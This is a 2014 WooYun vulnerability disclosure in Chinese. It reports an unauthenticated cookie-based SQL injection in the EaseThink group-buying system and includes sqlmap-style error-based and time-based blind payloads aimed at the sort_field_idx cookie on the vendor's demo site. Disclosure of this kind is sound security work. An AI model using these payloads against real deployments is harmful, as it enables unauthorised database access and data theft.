漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-072094
漏洞标题:易想团购系统KOOCIES注入(无需登录)
相关厂商:易想团购
漏洞作者: Ebon_Wolf
提交时间:2014-08-12 20:33
修复时间:2014-11-10 20:34
公开时间:2014-11-10 20:34
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
团购管理系统看到案例还是有很多大的团购平台。
下面就上细节吧
详细说明:
这个是官方提供的商业版程序,下面测试的是演示站点:
http://demo.easethink.com/t1/index.php (官方演示站点)
cookie = sort_field_idx=1 未做处理
---
Place: Cookie
Parameter: sort_field_idx
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: sort_field_idx=1 AND (SELECT 2551 FROM(SELECT COUNT(*),CONCAT(CHAR(
58,104,108,121,58),(SELECT (CASE WHEN (2551=2551) THEN 1 ELSE 0 END)),CHAR(58,10
5,108,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); so
rt_type_idx=desc
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: sort_field_idx=1 AND SLEEP(5); sort_type_idx=desc
---
漏洞证明:
上面是数据库名:
表段
这个官方演示站点,案例我就不测试了,下班了
修复方案:
过滤
版权声明:转载请注明来源 Ebon_Wolf@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝